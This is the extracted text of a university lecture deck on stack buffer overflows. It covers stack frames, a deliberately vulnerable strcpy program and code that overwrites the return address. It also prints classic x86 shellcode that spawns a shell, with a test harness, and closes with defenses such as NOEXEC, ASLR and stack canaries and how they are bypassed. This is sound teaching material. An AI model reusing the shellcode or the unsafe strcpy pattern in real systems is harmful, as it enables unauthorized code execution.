l4p3 stack overflow

8/14/2019 L4P3 Stack Overflow

1/31

Buffer Overflow AttackPHAM VAN HAU ( [email protected] )

SCHOOL OF COMPUTER SCI ENCE ANDENGINEERING, INTERNATIONAL UNIVERSITY
mailto:[email protected]:[email protected]


2/31


3/31

Memory Organization (1)

Global, static variables

Program code(instructions)

Localvariables

M em

or y

a d d r e

s s d e cr e a s e

Text

Initialized/Uninitializeddata

Stack


4/31

Stack operationStack: A stack is an abstract data type. Stack contains objects inwhich the last object placed on the stack will be the first objectremoved (last in, first out queue, or a LIFO).

Two important operations of stack are PUSH and POP.

PUSH adds an element at the top of the stack.POP removes the element at the top of the

stack.


5/31

Assembly Example

Functionvoid fun(int a, int b, int c){

char buffer1[5];char buffer2[10];

}void main() {

fun(1,2,3);}


6/31


7/31

Functionvoid fun(int a, int b, int c){

char buffer1[5];

char buffer2[10];}void main() {

fun(1,2,3);}

Stack

main

fun


8/31

Procedure prolog/epilogProcedure prologue :Save the previous FP

SP into FP to create the new FP

prologue


9/31

Procedure prolog/epilogProcedure epilog :the stack must be cleaned up again

movl %ebp,%esp

popl %ebp

ret

prologue

epilog


10/31

Stack in function callingHigh level languages need function and procedure. Stack helps toimplement this.

The stack is used to dynamically allocate the local variables used infunctions, to pass parameters to the functions, and to return valuesfrom the function.


11/31


12/31

Stack in actionvoid fun(int a, int b, int c) {char buffer1[5];

char buffer2[10];

}

void main() {

fun(1,2,3);

}

M em

or y

a d d r e

s si n

cr e a s e s

21

Saved IPSaved EBP

Buffer1

Buffer2

3

Top of stack


13/31

Buffer overflow in a nutshellCompile : gcc -o vul1vul1.c

./vul1nothing happens

./vul1 hellooutput=hello

Instead of hello bygiving suitable input wecan modify the behavior ofvul1, e.g. to spawn a shell

void main(int argc, char *argv[]) {

char buffer[512];

if (argc > 1) {strcpy(buffer,argv[1]);

printf (%s,buffer );

}

}

Program: vul1.c


14/31

Buffer overflow can redirect

execution flowvoid function(int a, int b, int c) {char buffer1[5];

char buffer2[10];

int *ret;

ret = buffer1 + 12;

(*ret) += 8;

}

void main() {

int x;

x = 0;

function(1,2,3);

x = 1;

printf("%d\n",x);

Demo example{2,3}.c


15/31

Binary Code (1) Binary code

assembly code

int g;void main(){

int x;

int y;int z;x=1;y=2;

z=x+y;g=z;}


16/31


17/31

Shellcode (1)In most cases we'll simply want the program to spawn a shell, fromwhere we can then issue other commands as we wish.

Place the code with are trying to execute in the buffer we areoverflowing, and overwrite the return address so it points back intothe buffer.


18/31

Shellcode (2) M em

or y

a d d r e

s s d e cr e a s e s

21

Saved EBPBuffer1

Buffer2

3

Shellcode

Saved IP

Shellcode

Top of stack


19/31

Code to open a shellvoid main(int argc, char **argv) {

char *name[2];name[0] = "/bin/sh";name[1] = NULL;execve(name[0], name, NULL);

}

In C


20/31

Shellcode to open a shellchar shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh


21/31

Test the Shellcodechar shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;

}

Demo testshellcode.cExploit1.c


22/31

DemoExploit1

Exploit2

Exploit3


23/31

Classification of buffer-overflow

Local buffer overflow: increase privilege on the local machine

Remote buffer overflow: gain access to a remote machine


24/31

Kernel-Enforced Protection(PaX Project)Non-executable (NOEXEC): prevents the injection and execution of codeinto a task's address space http://pax.grsecurity.net/docs/noexec.txt

The first feature NOEXEC implements is the executable semantics on memorypages.

making all available executable memory including the stack, heap and allanonymous mappings non-executable.

locking down of permissions on memory pages: prevent the creation of writable/executable file mappings (anonymous

mappings are already made non-executable) we also refuse to turn a writable or non-executable mapping into an

executable one and vice versa.
http://pax.grsecurity.net/docs/noexec.txthttp://pax.grsecurity.net/docs/noexec.txt


25/31

Kernel-Enforced Protection(PaX Project)Address Space Layout Randomization (ASLR)http://pax.grsecurity.net/docs/aslr.txt

introducing randomness into the virtual memory layout for aparticular process

varying levels of randomness during the process of loading abinary so that the binary mapping, dynamic library linking andstack memory regions are all randomized before the processbegins executing
http://pax.grsecurity.net/docs/aslr.txthttp://pax.grsecurity.net/docs/aslr.txt


26/31


27/31


28/31

StackGuard StackGuard adds code at the RTL level to the function_prologue andfunction_epilogue functions within GCC to provide the generation andvalidation of the stack canary

random canary directly before the return address

Canary changes, it means that there is stack smashing

Defeating StackGuard Possibility of bypassing StackGuard by overwriting local variables that could then be

used to compromise the protection. overwriting function pointers and frame pointers stored on the stack can also lead to

compromise. Protection against nonstack-based attack vectors such as heapoverflows is also beyond the scope of StackGuard

( A Comparison of Buffer Overflow Prevention Implementationsand Weaknesses )


29/31

ProPolice Stack-SmashingProtection (SSP)SSP proactively monitors stack changes.SSPs approach re -arranges argumentlocations, return addresses, previousframe pointers and local variables. SSPhas come up with the following safestack model

Defeating ProPolice SSP

ProPolice is better protection againststack overflows than the other

compiler patches but still have problem( A Comparison of Buffer OverflowPrevention Implementations andWeaknesses )


30/31

StackShield the return address is copied to the Global Ret Stack the return address is copied from the Global Ret Stack to theapplications stack, overwriting any possible compromise

Defeating StackShield Methods for defeating StackShield are similar to those used to

bypass StackGuard protection


31/31

Windows 2003 StackProtection

Microsoft implemented a compiler-based protection solution to ensurethat their products were secure out of the box. Microsofts solution isvery similar to Crispin Cowans StackGuard covered earlier in this paper

NGSEC StackDefender 1.10 works in the kernel level

http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26
http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26http://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26

l4p3 stack overflow

Documents